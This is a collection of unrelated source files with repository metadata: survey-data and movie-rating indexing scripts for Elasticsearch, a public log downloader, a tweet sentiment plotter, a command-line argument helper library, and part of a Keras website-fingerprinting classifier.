def transform(self, mat: Matrix):
return self.get_labels(mat)
def fit_transform(self, mat: Matrix, verbose: bool=False):
self.fit(mat, verbose=verbose)
return self.transform(mat)
if __name__ == "__main__":
A = Matrix([
[1, 2, 3, 6],
[3, 10, 2, 1],
[4, 9, 1, 1],
[1, 3, 3, 5],
[1, 3, 4, 5],
[0, 3, 3, 5]
])
# PCA
pca = PCA()
pca.fit(A)
print(pca.transform(A).get_list())
# KMean
km = KMean(2)
print(km.fit_transform(A, verbose=True))
``` |
{
"source": "jp-costa/examples",
"score": 3
} |
#### File: cdc_nutrition_exercise_patterns/scripts/process_brfss_data.py
```python
import xport
import pandas as pd
import csv
import numpy as np
import re
import elasticsearch
import json
import pprint as pprint
es = elasticsearch.Elasticsearch()
# Import data and read into a dataframe
f = open('./LLCP2013.ASC', encoding='iso-8859-1')
cdc = f.read().splitlines()
t = pd.DataFrame({'Var': cdc})
# Data references:
# - Data: http://www.cdc.gov/brfss/annual_data/2013/files/LLCP2013ASC.ZIP
# - Data Codebook: http://www.cdc.gov/brfss/annual_data/2013/pdf/codebook13_llcp.pdf
# - Variable layout: http://www.cdc.gov/brfss/annual_data/2013/llcp_varlayout_13_onecolumn.html
# Each row in the BRFSS data file corresponds to a respondent. The responses to 321 questions are coded in
# a single 2365-character numeric string. The variable_list.csv file maps the column numbers
# to fields. For example, columns 18-19 hold a 2-digit code for the interview month.
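# For instance, the interview month (columns 18-19 above) could be pulled out with a
# 0-indexed slice such as t['Var'].map(lambda x: x[17:19]); the loop further below does
# the same thing generically for every variable kept in varKeep.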
var = pd.read_csv('./variable_list.csv')
# We will only be looking at a subset of the columns in this analysis - these columns have been coded with a
# Keep = Yes value in the variable list.
varKeep = var[var['Keep'] == 'Yes']
# Decode the numeric response into feature.
for i, row in varKeep.iterrows():
st = row['Starting Column'] - 1
en = st + row['Field Length']
#print(st, en)
t[row['Variable Name']] = t['Var'].map(lambda x: x[st:en])
#print(row['Variable Name'])
# Create deep copy of variable
t1 = t.copy(deep=True)
# Function to convert datetime
from datetime import datetime
def str_to_iso(text):
if text != '':
for fmt in (['%m%d%Y','%d%m%Y']):
try:
return datetime.isoformat(datetime.strptime(text, fmt))
except ValueError:
if text == '02292014':
return datetime.isoformat(datetime.strptime('02282014', fmt))
elif text == '09312014':
return datetime.isoformat(datetime.strptime('09302014', fmt))
print(text)
pass
raise ValueError('Changing date')
else:
return None
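# e.g. str_to_iso('03152013') -> '2013-03-15T00:00:00' (parsed with the '%m%d%Y' format).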
# id to state map
st = pd.read_csv('./State.csv')
# Convert state value from string to int
t1['_STATE'] = t1['_STATE'].map(lambda x: int(x))
# Map numeric value of state to state name
st1 = st[['ID', 'State']].set_index('ID').to_dict('dict')['State']
t1['_STATE'] = t1['_STATE'].replace(st1)
# Grab avg coordinates for state
lat = st.set_index('State')[['Latitude']].to_dict()['Latitude']
lon = st.set_index('State')[['Longitude']].to_dict()['Longitude']
t1['Latitude'] = t1['_STATE'].replace(lat)
t1['Longitude'] = t1['_STATE'].replace(lon)
# Convert interview date values into numeric
t1['FMONTH'] = t1['FMONTH'].map(lambda x: int(x))
t1['IMONTH'] = t1['IMONTH'].map(lambda x: int(x))
t1['IDAY'] = t1['IDAY'].map(lambda x: int(x))
t1['IDATE'] = t1['IDATE'].map(lambda x: str_to_iso(x))
# Alcohol consumption
t1['AVEDRNK2'] = t1['AVEDRNK2'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks per occasion
t1['DRNK3GE5'] = t1['DRNK3GE5'].map(lambda x: int(x) if not str.isspace(x) else None) # binge days
t1['MAXDRNKS'] = t1['MAXDRNKS'].map(lambda x: int(x) if not str.isspace(x) else None) # max drinks per occasion in last 30 days
t1['_DRNKDY4'] = t1['_DRNKDY4'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks/day
t1['_DRNKMO4'] = t1['_DRNKMO4'].map(lambda x: int(x) if not str.isspace(x) else None) # drinks/month
t1['DROCDY3_'] = t1['DROCDY3_'].map(lambda x: int(x) if not str.isspace(x) else None) # drink occasions in last 30 days
choice = {'1':'No', '2':'Yes', '9': 'Missing'}
t1['_RFBING5'] = t1['_RFBING5'].replace(choice) # binge drinker?
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['DRNKANY5'] = t1['DRNKANY5'].replace(choice) # any drinks in last 30 days?
# Activity & exercise
# Refer to the codebook ( http://www.cdc.gov/brfss/annual_data/2013/pdf/codebook13_llcp.pdf) for variable meaning
t1['METVL11_'] = t1['METVL11_'].map(lambda x: int(x) if not str.isspace(x) else None)/10
t1['METVL21_'] = t1['METVL21_'].map(lambda x: int(x) if not str.isspace(x) else None)/10
t1['MAXVO2_'] = t1['MAXVO2_'].map(lambda x: int(x) if not str.isspace(x) else None) / 100
t1['FC60_'] = t1['FC60_'].map(lambda x: int(x) if not str.isspace(x) else None) / 100
t1['PADUR1_'] = t1['PADUR1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PADUR2_'] = t1['PADUR2_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAFREQ1_'] = t1['PAFREQ1_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['PAFREQ2_'] = t1['PAFREQ2_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['STRFREQ_'] = t1['STRFREQ_'].map(lambda x: int(x) if not str.isspace(x) else None) / 1000
t1['PAMIN11_'] = t1['PAMIN11_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAMIN21_'] = t1['PAMIN21_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PA1MIN_'] = t1['PA1MIN_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAVIG11_'] = t1['PAVIG11_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PAVIG21_'] = t1['PAVIG21_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PA1VIGM_'] = t1['PA1VIGM_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXERHMM1'] = t1['EXERHMM1'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXERHMM2'] = t1['EXERHMM2'].map(lambda x: int(x) if not str.isspace(x) else None)
#t1['EXEROFT1'] = t1['EXEROFT1'].map(lambda x: exerFcn(x))
#t1['EXEROFT2'] = t1['EXEROFT2'].map(lambda x: exerFcn(x))
#t1['STRENGTH'] = t1['STRENGTH'].map(lambda x: exerFcn(x))
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['EXERANY2'] = t1['EXERANY2'].replace(choice)
choice={'1': 'Had exercise in last 30 days',
'2': 'No exercise in last 30 days',
'9': 'Don’t know/Not sure/Missing'}
t1['_TOTINDA'] = t1['_TOTINDA'].replace(choice)
choice = { '0' : 'Not Moderate / Vigorous or No Activity',
'1' : 'Moderate',
'2' : 'Vigorous'}
t1['ACTIN11_'] = t1['ACTIN11_'].replace(choice)
t1['ACTIN21_'] = t1['ACTIN21_'].replace(choice)
choice = {'1' : 'Highly Active',
'2' : 'Active',
'3' : 'Insufficiently Active',
'4' : 'Inactive',
'9' : 'Don’t know' }
t1['_PACAT1'] = t1['_PACAT1'].replace(choice)
choice = {'1' : 'Met aerobic recommendations',
'2' : 'Did not meet aerobic recommendations',
'9' : 'Don’t know' }
t1['_PAINDX1'] = t1['_PAINDX1'].replace(choice)
choice = {'1' : 'Meet muscle strengthening recommendations',
'2' : 'Did not meet muscle strengthening recommendations',
'9' : 'Missing'}
t1['_PASTRNG'] = t1['_PASTRNG'].replace(choice)
choice = {'1' : 'Met both guidelines',
'2' : 'Met aerobic guidelines only',
'3' : 'Met strengthening guidelines only',
'4' : 'Did not meet either guideline',
'9' : 'Missing' }
t1['_PAREC1'] = t1['_PAREC1'].replace(choice)
choice = {'1' : 'Met both guidelines',
'2' : 'Did not meet both guideline',
'9' : 'Missing' }
#t1['_PASTAE1'] = t1['_PASTAE1'].replace(choice)
# Map activity code to activity names
act = pd.read_csv('./activity.csv', encoding='iso-8859-1')
act['Activity'] = act['Activity'].map(lambda x: re.sub(r'\s*$','', x))
t1['EXRACT11'] = t1['EXRACT11'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['EXRACT11'] = t1['EXRACT11'].replace(act.set_index('ID').to_dict()['Activity'])
t1['EXRACT21'] = t1['EXRACT21'].map(lambda x: int(x) if not str.isspace(x) else '')
t1['EXRACT21'] = t1['EXRACT21'].replace(act.set_index('ID').to_dict()['Activity'])
# Height, Weight, Age, BMI
t1['_BMI5'] = t1['_BMI5'].map(lambda x: int(x) if not str.isspace(x) else None)/100
choice={'1': 'Underweight',
'2': 'Normal weight',
'3': 'Overweight',
'4':'Obese'}
t1['_BMI5CAT'] = t1['_BMI5CAT'].replace(choice)
# Height & Weight
t1['WTKG3'] = t1['WTKG3'].map(lambda x: int(x) if not str.isspace(x) else None)/100
t1['HTM4'] = t1['HTM4'].map(lambda x: int(x) if not str.isspace(x) else None)/100
t1['HTIN4'] = t1['HTIN4'].map(lambda x: int(x) if not str.isspace(x) else None)
# Nutrition
## NOTE: Values include two implied decimal places
# Vegetable & Fruit intake per day
t1['_FRUTSUM'] = t1['_FRUTSUM'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['_VEGESUM'] = t1['_VEGESUM'].map(lambda x: int(x) if not str.isspace(x) else None)
# Food intake - times per day
t1['FRUTDA1_'] = t1['FRUTDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['VEGEDA1_'] = t1['VEGEDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['GRENDAY_'] = t1['GRENDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['ORNGDAY_'] = t1['ORNGDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['FTJUDA1_'] = t1['FTJUDA1_'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['BEANDAY_'] = t1['BEANDAY_'].map(lambda x: int(x) if not str.isspace(x) else None)
# Salt intake and advice
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['WTCHSALT'] = t1['WTCHSALT'].replace(choice)
t1['DRADVISE'] = t1['DRADVISE'].replace(choice)
# In[13]:
# Demographics
choice = {'1' : 'Did not graduate High School',
'2' : 'Graduated High School',
'3' : 'Attended College or Technical School',
'4' : 'Graduated from College or Technical School',
'9' : 'Don’t know/Not sure/Missing'}
t1['_EDUCAG'] = t1['_EDUCAG'].replace(choice)
choice = {'1' : 'Male',
'2' : 'Female'}
t1['SEX'] = t1['SEX'].replace(choice)
choice = {'1' : '< $15000',
'2' : '$15,000 - $25,000',
'3' : '$25,000 - $35,000',
'4' : '$35,000 - $50,000',
'5' : '> $50,000',
'9' : 'Don’t know/Not sure/Missing'}
t1['_INCOMG'] = t1['_INCOMG'].replace(choice)
choice = {'1':'Employed for wages', '2':'Self-employed', '3': 'Unemployed < 1 year', '4': 'Unemployed > 1 year', '5': 'Homemaker', '6' : 'Student', '7': 'Retired' , '8': 'Unable to work', '9': 'Refused'}
t1['EMPLOY1'] = t1['EMPLOY1'].replace(choice)
choice = {'1':'< Kindergarden', '2':'Elementary', '3': 'Some high-school', '4': 'High-school graduate', '5': 'College / tech school', '6' : 'College grade', '9': 'Refused'}
t1['EDUCA'] = t1['EDUCA'].replace(choice)
choice = {'1':'Married', '2':'Divorced', '4': 'Separated', '3': 'Widowed', '5': 'Never Married', '6':'Unmarried couple', '9': 'Refused'}
t1['MARITAL'] = t1['MARITAL'].replace(choice)
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['VETERAN3'] = t1['VETERAN3'].replace(choice)
# Age
choice = {
'01' : 'Age 18 to 24',
'02' : 'Age 25 to 29',
'03' : 'Age 30 to 34',
'04' : 'Age 35 to 39',
'05': 'Age 40 to 44',
'06' : 'Age 45 to 49',
'07': 'Age 50 to 54',
'08': 'Age 55 to 59',
'09': 'Age 60 to 64',
'10': 'Age 65 to 69',
'11': 'Age 70 to 74',
'12': 'Age 75 to 79' ,
'13': 'Age 80 or older',
'14': 'Don’t know/Refused/Missing'}
t1['_AGEG5YR'] = t1['_AGEG5YR'].replace(choice)
# General health
choice = {'5':'Poor', '3':'Good', '1':'Excellent', '2':'Very Good', '4':'Fair', '7':'Don\'t know' , '9': 'Refused'}
t1['GENHLTH'] = t1['GENHLTH'].replace(choice)
choice = {'1':'Yes', '2':'No', '7':'Don\'t know' , '9': 'Refused'}
t1['QLACTLM2'] = t1['QLACTLM2'].replace(choice)
t1['USEEQUIP'] = t1['USEEQUIP'].replace(choice)
t1['DECIDE'] = t1['DECIDE'].replace(choice)
t1['DIFFWALK'] = t1['DIFFWALK'].replace(choice)
t1['DIFFDRES'] = t1['DIFFDRES'].replace(choice)
t1['DIFFALON'] = t1['DIFFALON'].replace(choice)
t1['MENTHLTH'] = t1['MENTHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['POORHLTH'] = t1['POORHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['SLEPTIM1'] = t1['SLEPTIM1'].map(lambda x: int(x) if not str.isspace(x) else None)
t1['PHYSHLTH'] = t1['PHYSHLTH'].map(lambda x: int(x) if not str.isspace(x) else None)
# Map variable names to more descriptive names
varDict = var[['Variable Name', 'DESC']].to_dict('split')
varDict = dict(varDict['data'])
t1.rename(columns=varDict, inplace=True)
# Replace space / special characters with underscore
t1.rename(columns=lambda x: re.sub(' ', '_', x), inplace=True)
t1.rename(columns=lambda x: re.sub(r'\(|\-|\/|\|\>|\)|\#', '', x), inplace=True)
t1.rename(columns=lambda x: re.sub(r'\>', 'GT', x), inplace=True)
# Delete original row
del(t1['Var'])
t1.fillna('', inplace=True)
### Create and configure Elasticsearch index
# Name of index and document type
index_name = 'brfss';
doc_name = 'respondent'
# Delete the brfss index if one already exists
if es.indices.exists(index_name):
es.indices.delete(index_name)
# Create the brfss index
es.indices.create(index_name)
# Add mapping
with open('brfss_mapping.json') as json_mapping:
d = json.load(json_mapping)
es.indices.put_mapping(index=index_name, doc_type=doc_name, body=d)
### Index Data into Elasticsearch
for subj_id, subject in t1.iterrows():
if subj_id % 1000 == 0:
print(subj_id)
thisResp = subject.to_dict()
thisResp['Coordinates'] = [thisResp['Longitude'], thisResp['Latitude']]
thisDoc = json.dumps(thisResp);
#pprint.pprint(thisDoc)
# write to elasticsearch
es.index(index=index_name, doc_type=doc_name, id=subj_id, body=thisDoc)
```
#### File: Graph/apache_logs_security_analysis/download_data.py
```python
import datetime,requests,gzip,shutil,os,argparse
from dateutil.relativedelta import *
from dateutil import parser as date_parser
parser = argparse.ArgumentParser(description='Download Secrepo Logs')
parser.add_argument('--start_date', dest="start_date", default="2015-01-17",help='start date')
parser.add_argument('--output_folder', dest="output_folder", default="./data",help='output folder')
parser.add_argument('--overwrite', dest="overwrite",type=bool, default=False,help='overwrite previous files')
args = parser.parse_args()
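# Example run (flags are optional; the values shown are the script defaults):
#   python download_data.py --start_date 2015-01-17 --output_folder ./data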
base_url="http://www.secrepo.com/self.logs/%s"
base_filename="access.log.%s.gz"
end_date = datetime.date.today()
output_folder=args.output_folder
current_date = date_parser.parse(args.start_date)
def download_file(url,filename):
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
return filename
print("Received %s code for %s"%(r.status_code,url))
return None
def extract(filename,overwrite):
#only extract if it doesn't exist
output_file=output_folder+'/'+(os.path.splitext(filename)[0])
if not os.path.exists(output_file) or overwrite:
print ("Extracting file %s"%filename)
with gzip.open(filename, 'rb') as f_in, open(output_file, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
else:
print("Skipping Extraction File Exists")
if not os.path.exists(output_folder):
os.mkdir(output_folder)
while current_date.date() < end_date:
filename=base_filename%current_date.strftime('%Y-%m-%d')
url = base_url%filename
print("Downloading %s"%url)
filename = download_file(url,filename)
if filename:
extract(filename,overwrite=args.overwrite)
os.remove(filename)
else:
print("Could not download %s. Skipping."%url)
current_date = current_date+relativedelta(days=+1)
```
#### File: Graph/movie_recommendations/index_ratings.py
```python
import csv
from collections import deque
import elasticsearch
from elasticsearch import helpers
es = elasticsearch.Elasticsearch(http_auth=('elastic', 'changeme'))
movies_file = "./data/ml-20m/movies.csv"
ratings_file = "./data/ml-20m/ratings.csv"
mapping_file = "movie_recommendations.json"
def read_movies(filename):
movie_dict = dict()
with open(filename, encoding="utf-8") as f:
f.seek(0)
for x, row in enumerate(csv.DictReader(f, delimiter=',' ,quotechar='"' ,quoting=csv.QUOTE_MINIMAL)):
movie={'title':row['title'],'genres':row['genres'].split('|')}
t = row['title']
try:
year = int((row['title'][t.rfind("(") + 1: t.rfind(")")]).replace("-", ""))
if year <= 2016 and year > 1900:
movie['year'] = year
except:
pass
movie_dict[row["movieId"]]=movie
return movie_dict
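# Illustrative ml-20m row and the dict it becomes (the CSV columns are
# movieId,title,genres in the MovieLens 20M dump):
#   {'movieId': '1', 'title': 'Toy Story (1995)', 'genres': 'Adventure|Children'}
#   -> movie_dict['1'] == {'title': 'Toy Story (1995)',
#                          'genres': ['Adventure', 'Children'], 'year': 1995}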
def read_ratings(filename,movies):
with open(filename, encoding="utf-8") as f:
f.seek(0)
num_ratings=0
for x, row in enumerate(csv.DictReader(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)):
row.update(movies[row["movieId"]])
num_ratings += 1
if num_ratings % 100000 == 0:
print("Indexed %s ratings" % (num_ratings))
yield row
es.indices.delete(index="movie_lens_ratings",ignore=404)
es.indices.create(index="movie_lens_ratings", body=open(mapping_file,"r").read(), ignore=404)
print("Indexing ratings...")
deque(helpers.parallel_bulk(es,read_ratings(ratings_file,read_movies(movies_file)),index="movie_lens_ratings",doc_type="rating"), maxlen=0)
print ("Indexing Complete")
es.indices.refresh()
``` |
{
"source": "jpcrespo/twanalysis",
"score": 3
} |
#### File: twanalysis/app/sentiment.py
```python
import stanza, re, csv, os
import pandas as pd
from pysentimiento import create_analyzer
import matplotlib.pyplot as plt
from matplotlib import font_manager as fm, rcParams
import matplotlib.dates as mdates
from datetime import datetime, timedelta
nlp = stanza.Pipeline(lang='es');
analyzer = create_analyzer(task="sentiment", lang="es");
def tokenizar(mensaje):
    '''Given a sentence, strip numbers, symbols and links.
    ONLY the cleaned message is returned.'''
doc = nlp(mensaje);
    # collect the text of every token
word_tokens = [token.text.lower() for sent in doc.sentences for token in sent.words]
    # now strip symbols, links and numbers.
link = [re.sub('http\S+','',word) for word in word_tokens]
signs = '[/#@\'!"$%&()*+,-.:\;<=>?^_`{|}~]\\...'
link_signs = [re.sub(signs,'',word) for word in link]
link_signs_num = [re.sub('\d+','',word) for word in link_signs]
emoji_pattern = re.compile("["
u"\U0001F49A-\U000E007F" "]+", flags=re.UNICODE)
link_signs_num_e = [re.sub(emoji_pattern,'',word) for word in link_signs_num]
clean=[]
for i,word in enumerate(link_signs_num_e):
if not word == '':
clean.append(word)
return clean
def data_sentiment(target):
dataset = pd.read_csv('resultados/'+target+'.csv')
tw_text = dataset.iloc[:,2].values
x_time = pd.to_datetime(dataset.iloc[:,1].values)
x_time = [x.strftime('%Y/%m/%d') for x in x_time]
x_time = [datetime.strptime(x,'%Y/%m/%d') for x in x_time]
sentiment = []
for text in tw_text:
token = tokenizar(text)
mss=''
for x in token:
mss+=x
mss=mss+' '
resp = analyzer.predict(mss)
        # Map the prediction onto [0, 2] so that values below 1 are negative and
        # values above 1 are positive, matching the bands drawn in the plot below.
        if resp.output == 'NEG':
            sentiment.append(1 - resp.probas[resp.output])
        elif resp.output == 'POS':
            sentiment.append(1 + resp.probas[resp.output])
        else:
            sentiment.append(1)
with open('resultados/'+target+'_sent.csv','w',newline='\n') as file:
spw = csv.writer(file, delimiter=',')
spw.writerow(['fecha','dato'])
for x in zip(x_time[::-1],sentiment[::-1]):
spw.writerow(x)
df1=pd.read_csv('resultados/'+target+'_sent.csv',sep=',').sort_values(by='fecha').set_index('fecha')
#cnt1 = df1.rolling(7,min_periods=1).mean()
cnt = df1.rolling(28,min_periods=7).mean().iloc[:,:].values
#date = df1.index.values
x_time = pd.to_datetime(dataset.iloc[:,1].values)
x_time = [x.strftime('%Y/%m/%d') for x in x_time]
date = [datetime.strptime(i,'%Y/%m/%d') for i in x_time]
fpath = os.path.join('app/MonoLisa.ttf')
prop = fm.FontProperties(fname=fpath)
fname = os.path.split(fpath)[1]
    colores = [(192, 192, 192),  # background colour
               (0,0,0),          # text colour
               (230,230,230),    # off-white (secondary background)
               (25,25,112)]      # plot line colour
for i in range(len(colores)):
r, g, b = colores[i]
colores[i] = (r / 255., g / 255., b / 255.)
fig = plt.figure(figsize=(21,7),constrained_layout=True)
ax = plt.axes()
fig.patch.set_facecolor(colores[0])
ax.patch.set_facecolor(colores[2])
text_sets = {'color': colores[1],'weight': 'normal','size': 25,'fontproperties':prop}
plt.title('\nAnálisis sentimiento en el tiempo\n',fontsize=35,fontdict=text_sets)
plt.ylabel('\nSentimiento\n',fontdict=text_sets)
plt.xlabel('\nFecha\n',fontdict=text_sets)
plt.plot(date,cnt,linewidth=2,color=colores[3])
locator = mdates.AutoDateLocator(minticks=20, maxticks=30)
formatter = mdates.ConciseDateFormatter(locator)
ax.xaxis.set_major_locator(locator)
ax.xaxis.set_major_formatter(formatter)
plt.yticks(fontsize=15,fontproperties=prop,color=colores[1]);
plt.xticks(fontsize=18,rotation=0,fontproperties=prop,color=colores[1]);
#plt.gca().yaxis.grid(linestyle='--',linewidth=0.8,dashes=(5,15))
plt.gca().xaxis.grid(linestyle='--',linewidth=0.5,dashes=(8,10))
plt.text(date[-8],cnt[-1],' @'+target+' ',fontsize=20,fontproperties=prop,color=colores[3])
plt.gca().spines["top"].set_visible(False)
plt.gca().spines["bottom"].set_visible(True)
plt.gca().spines["right"].set_visible(False)
plt.gca().spines["left"].set_visible(True)
plt.ylim([0,2])
plt.xlim([date[0],date[-1]])
plt.axhline(1,color='azure') #horizontal line
ax.axhspan(0,1, facecolor='tomato', alpha=0.05)
ax.axhspan(1,2, facecolor='lime', alpha=0.05)
plt.text(date[-13],0.75,'Sentimiento\nNeutro',fontsize=13,fontproperties=prop,color='black')
plt.text(date[5],1.75,'Sentimiento\nPositivo',fontsize=13,fontproperties=prop,color='green')
plt.text(date[5],0.25,'Sentimiento\nNegativo',fontsize=13,fontproperties=prop,color='red')
plt.savefig('resultados/'+target+'_sent.png')
#os.remove('resultados/'+target+'_sent.csv')
``` |
{
"source": "jpcsmith/doceasy",
"score": 3
} |
#### File: jpcsmith/doceasy/doceasy.py
```python
import sys
import csv
import typing
from typing import IO
from docopt import docopt
from schema import (
SchemaError, And, Schema, Regex, Optional, Use, Forbidden, Const,
Literal, Or
)
__all__ = [
'Schema', 'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden',
'Const', 'Literal', 'PositiveInt', 'positive_int', 'AtLeast', 'doceasy',
'CsvFile',
]
PositiveInt = And(Use(int), lambda n: n >= 1,
error="Value should be an integer and at least 1")
def positive_int(value: str):
"""Extracts a positive integer from a string.
Raises ValueError if the string does not contain a positive integer.
"""
integer = int(value)
if integer < 1:
raise ValueError(f"invalid literal for a positive integer: '{value}'")
return integer
class AtLeast:
"""Validator to ensure that the argument is at least the value
specified in the constructor.
"""
def __init__(self, min_value):
self.min_value = min_value
def validate(self, value):
"""Attempt to validate the provided value."""
if value < self.min_value:
raise SchemaError(f"The value should be at least {self.min_value}")
return value
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, str(self.min_value))
class Mapping:
"""Validator that creates mappings.
The parameters kt_callable and vt_callable if provided should be
callables, such as "int", returning the desired type. If only
    kt_callable is provided it is used to convert the value in the
mapping. If both are provided kt_callable converts the key and
vt_callable converts the value.
"""
def __init__(self, kt_callable=None, vt_callable=None):
if vt_callable is None:
self._kt_callable = str
self._vt_callable = kt_callable or str
else:
assert kt_callable is not None
self._kt_callable = kt_callable
self._vt_callable = vt_callable
def validate(self, map_string: str) -> typing.Dict[str, typing.Any]:
"""Validate and extract the mapping."""
try:
items = [key_val.split("=", maxsplit=1)
for key_val in map_string.split(",")]
return {self._kt_callable(key): self._vt_callable(value)
for key, value in items}
except ValueError as err:
raise SchemaError(
f"Invalid mapping string for callables {map_string}") from err
@staticmethod
def to_string(mapping) -> str:
"""Convert the mapping to a string parsable by a Mapping
validator.
"""
return ",".join(f"{key}={value}" for key, value in mapping.items())
class File:
"""Validator that creates file objects for command line files or '-'.
"""
def __init__(self, mode: str = 'r', default: typing.Optional[str] = None):
self.mode = mode
self.default = default
def validate(self, filename: typing.Optional[str]) -> IO:
"""Validate the filename and return the associated file object."""
filename = filename or self.default
stdout = sys.stdout.buffer if 'b' in self.mode else sys.stdout
stdin = sys.stdin.buffer if 'b' in self.mode else sys.stdin
if filename == '-':
if any(m in self.mode for m in ['w', 'a', 'x']):
return stdout # type: ignore
return stdin # type: ignore
if filename is None:
            raise SchemaError(f"Invalid object to create a file: '{filename}'")
try:
return open(filename, mode=self.mode)
except Exception as err:
raise SchemaError(str(err)) from err
class CsvFile(File):
"""Validate and create a csv input/output file.
If dict_args is not None, a DictReader/-Writer will be created.
"""
def __init__(self, *args, dict_args: dict = None, **kwargs):
super().__init__(*args, **kwargs)
self.dict_args = dict_args
def validate(self, filename: typing.Optional[str]):
stream = super().validate(filename)
if any(m in self.mode for m in ['w', 'a', 'x']):
if self.dict_args is not None:
return csv.DictWriter(stream, **self.dict_args)
return csv.writer(stream)
if self.dict_args is not None:
return csv.DictReader(stream, **self.dict_args)
return csv.reader(stream)
def _validate(arguments: dict, schema: Schema) -> dict:
try:
return schema.validate(arguments)
except SchemaError as err:
sys.exit(f"Invalid argument: {err}")
def _rename_arguments(arguments: dict):
return {
key.lower().strip('-').replace('-', '_'): value
for key, value in arguments.items()
}
def doceasy(
docstring: str,
schema: typing.Union[Schema, typing.Dict, None] = None,
rename: bool = True, **kwargs
) -> dict:
"""Parse the command line arguments."""
arguments = docopt(docstring, **kwargs)
if isinstance(schema, dict):
schema = Schema(schema)
if schema is not None:
arguments = _validate(arguments, schema)
if rename:
arguments = _rename_arguments(arguments)
return arguments
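# Minimal usage sketch (the docstring, option names and schema are illustrative):
#
#   """Usage: myscript [--count=N] INFILE"""
#   ARGS = doceasy(__doc__, Schema({
#       "--count": Or(None, Use(positive_int)),
#       "INFILE": File(mode="r", default="-"),
#   }))
#   # keys are renamed, e.g. "--count" -> "count", "INFILE" -> "infile"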
``` |
{
"source": "jpcsmith/wf-tools",
"score": 3
} |
#### File: lab/classifiers/dfnet.py
```python
from tensorflow.compat.v1 import keras
from tensorflow.compat.v1.keras import layers, initializers
from lab.classifiers.wrappers import ModifiedKerasClassifier
def build_model(n_features: int, n_classes: int):
"""Create and return the DeepFingerprinting Model."""
model = keras.Sequential()
# Block1
filter_num = ['None', 32, 64, 128, 256]
kernel_size = ['None', 8, 8, 8, 8]
conv_stride_size = ['None', 1, 1, 1, 1]
pool_stride_size = ['None', 4, 4, 4, 4]
pool_size = ['None', 8, 8, 8, 8]
model.add(layers.Reshape((n_features, 1), input_shape=(n_features,)))
model.add(layers.Conv1D(
filters=filter_num[1], kernel_size=kernel_size[1],
strides=conv_stride_size[1], padding='same', name='block1_conv1'))
model.add(layers.BatchNormalization(axis=-1))
model.add(layers.ELU(alpha=1.0, name='block1_adv_act1'))
model.add(layers.Conv1D(
filters=filter_num[1], kernel_size=kernel_size[1],
strides=conv_stride_size[1], padding='same', name='block1_conv2'))
model.add(layers.BatchNormalization(axis=-1))
model.add(layers.ELU(alpha=1.0, name='block1_adv_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[1], strides=pool_stride_size[1], padding='same',
name='block1_pool'))
model.add(layers.Dropout(0.1, name='block1_dropout'))
model.add(layers.Conv1D(
filters=filter_num[2], kernel_size=kernel_size[2],
strides=conv_stride_size[2], padding='same', name='block2_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block2_act1'))
model.add(layers.Conv1D(
filters=filter_num[2], kernel_size=kernel_size[2],
strides=conv_stride_size[2], padding='same', name='block2_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block2_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[2], strides=pool_stride_size[3], padding='same',
name='block2_pool'))
model.add(layers.Dropout(0.1, name='block2_dropout'))
model.add(layers.Conv1D(
filters=filter_num[3], kernel_size=kernel_size[3],
strides=conv_stride_size[3], padding='same', name='block3_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block3_act1'))
model.add(layers.Conv1D(
filters=filter_num[3], kernel_size=kernel_size[3],
strides=conv_stride_size[3], padding='same', name='block3_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block3_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[3], strides=pool_stride_size[3], padding='same',
name='block3_pool'))
model.add(layers.Dropout(0.1, name='block3_dropout'))
model.add(layers.Conv1D(
filters=filter_num[4], kernel_size=kernel_size[4],
strides=conv_stride_size[4], padding='same', name='block4_conv1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block4_act1'))
model.add(layers.Conv1D(
filters=filter_num[4], kernel_size=kernel_size[4],
strides=conv_stride_size[4], padding='same', name='block4_conv2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='block4_act2'))
model.add(layers.MaxPooling1D(
pool_size=pool_size[4], strides=pool_stride_size[4], padding='same',
name='block4_pool'))
model.add(layers.Dropout(0.1, name='block4_dropout'))
model.add(layers.Flatten(name='flatten'))
model.add(layers.Dense(
512, kernel_initializer=initializers.glorot_uniform(seed=0),
